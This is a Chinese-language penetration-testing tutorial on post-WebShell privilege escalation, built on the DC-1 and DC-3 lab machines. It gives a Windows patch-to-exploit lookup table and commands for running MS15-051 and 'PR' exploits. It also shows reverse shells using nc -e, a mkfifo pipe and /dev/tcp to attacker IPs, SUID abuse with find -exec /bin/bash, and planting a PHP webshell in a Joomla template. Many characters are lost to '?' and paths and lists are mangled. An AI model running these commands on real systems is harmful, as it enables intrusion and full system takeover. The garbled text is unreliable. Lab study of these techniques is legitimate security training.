當拿到WebShell 之后,下?步?什么?
權限提升
通過一些最初的漏洞利?途徑,攻擊者將獲得?定的訪問權限。接著,攻擊者將逐步探
查其破壞的系統來獲得?最初更多的權限,以期望從其他賬戶訪問敏感信息,甚?獲得
對整個系統的完全管理控制。當攻擊者以這種?式擴?其最初的未經授權訪問的權限
時,將其?為稱為權限提升攻擊。簡單來說,就是獲取?最初更多的權限,甚?系統權限。
?平權限提升(越權)
我們假設攻擊者已經獲得了在線銀?賬戶的訪問權限,他的?的是竊取?錢,但他從這?賬戶中竊
取的?錢并不多。這時,他就會尋找信息或者嘗試各種漏洞利?途徑來獲得對其他賬戶的訪問權
限。這稱之為?平權限提升,因為攻擊者是在具有相似權限的賬戶中橫向移動。
垂直權限提升
通常攻擊者的動機是完全控制計算機系統(管理員權限),以便可以任意使?系統。當攻擊者?先從
被攻擊的?戶賬戶開始并能夠將其擁有的單??戶擴?或提升完全管理權限或“根”權限時,我們稱
這類攻擊為垂直權限提升。
windows 提權
針對于很多windows 系統,有時候會安裝Web 套件(phpStudy),Web 套件的權限是?較?的。
操作系統漏洞提權
根據沒有修補的補丁號碼,直接提權即可。
補丁:kb
漏洞公告:MS
補丁與漏洞對照表
KB2360937 MS10-084
KB2478960 MS11-014KB2507938 MS11-056KB2566454 MS11-062KB2646524 MS12-003KB2645640 MS12-009KB2641653 MS12-018KB944653 MS07-067KB952004 MS09-012 PR
KB971657 MS09-041KB2620712 MS11-097KB2393802 MS11-011kb942831 MS08-005KB2503665 MS11-046KB2592799 MS11-080KB956572 MS09-012 巴?烤?
KB2621440 MS12-020KB977165 MS10-015 Ms Viru
KB4013081 MS17-017KB3139914 MS16-032KB3124280 MS16-016KB3134228 MS16-014KB3079904 MS15-097KB3077657 MS15-077KB3045171 MS15-051KB3000061 MS14-058KB2829361 MS13-046KB2850851 MS13-053 EPATHOBJ 0day 限32位
KB2707511 MS12-042 sysret -pid
KB2124261 KB2271195 MS10-065 IIS7
KB3198234 MS16-135KB970483 MS09-020 IIS6
KB3031432 MS15-015
Windows Server 2003:
Window Server 2008訪問:
password:black
未執行,權限過低!
手動上傳一個提權工具:
systeminfo>C:WindowsTempa.txt&(for %i in (KB3057191 KB2840221 KB3000061
KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type
C:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:WindowsTempa.txt
根據補丁與漏洞對照表,可選擇PR 提權。(具體提權原理涉及到Windows 系統底層知識,此處不再贅述,只需要使?提權EXP 即可)
/c C:/Inetpub/ewebeditorv280/uploadfile/pr.exe "whoami"
Windows Server 2008:
執?以下命令
systeminfo>C:WindowsTempa.txt&(for %i in (KB3124280 KB3143141 KB3134228
KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851KB2707511 KB970483 KB2124261 KB2271195 KB3031432) do @type
C:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:WindowsTempa.txt
根據補丁對照表,我們選擇MS15-051。
上傳EXP (注意上傳到可寫?錄)并提權!
數據庫提權
核?思路:利?數據庫執?系統命令。
MSSQL 提權
需要提供sa ?戶密碼。
MySQL 提權
需要知道root ?戶密碼。
MySQL udf 提權MySQL mof 提權
反彈Shell
由于WebShell (正向Shell)是基于HTTP 的,不是持久性鏈接。
可以通過反彈Shell 的?法獲得持久性連接(基于TCP 協議的),?便與對?進?通信。
反彈shell ,讓對?主動來連接“我”。
windows 平臺
windows 平臺需要借助 nc.exe ?具。
# 本地監聽 2333 端?
nc.exe -lnvp 2333
ncat -lnvp 2333
# 服務器端反彈Shell
nc.exe -e cmd.exe 192.168.10.10 2333
ms15-051.exe "nc.exe -e cmd.exe 192.168.16.104 2333"
反彈成功:
提權:
linux平臺
在獲得?標系統WebShell 的情況下
# 本地監聽2333 端?
ncat -lnvp 2333
# 服務端反彈shellnc -e /bin/bash 192.168.16.100 2333
不需要-e參數的情況:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.100 2333
>/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333
>/tmp/f
/bin/sh -i >& /dev/tcp/192.168.16.100/2333 0>&1
Linux 提權
SUID 提權
?標環境:DC1
SUID 的概念:具有SUID 標識的命令,在執?期間擁有所有者權限。
特點:簡單、快速。
進?交互式Shell
Python --version
python -c 'import pty;pty.spawn("/bin/bash")'
系統中具有SUID 標識的命令都有哪些
find / -perm -4000 2>/dev/null
www-data@DC-1:/var/www$ ls -alh /usr/bin/find
ls -alh /usr/bin/find-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
www-data@DC-1:/var/www$
# find 命令在執?期間具有root 權限
?find 命令調?bash
find /tmp/ajest -exec "/bin/bash" ;
find /tmp/ajest -exec "/bin/sh" ;
其他可以提權(調?Shell)命令
vim
gitnmap...
注意:先前文章已有詳細介紹,這里不再贅述!
操作系統漏洞提權
?標環境:DC3
searchsploit joomla 3.7.0
getShell:
寫入一句話木馬,通過蟻劍連接:
# 如果以管理員身份登錄joomla ,就可以編輯后臺腳本(php)?件。
# 修改?站后臺腳本?件的位置
Extensions|Templates|Templates|Beez3 Details and Files
http://192.168.16.109/templates/beez3/html/config.php
普通權限,提權:
上傳提權腳本
.sh:檢查系統中存在哪些可以利用的提權漏洞
提權成功:
獲取DC3的flag:
=== Well Done!===
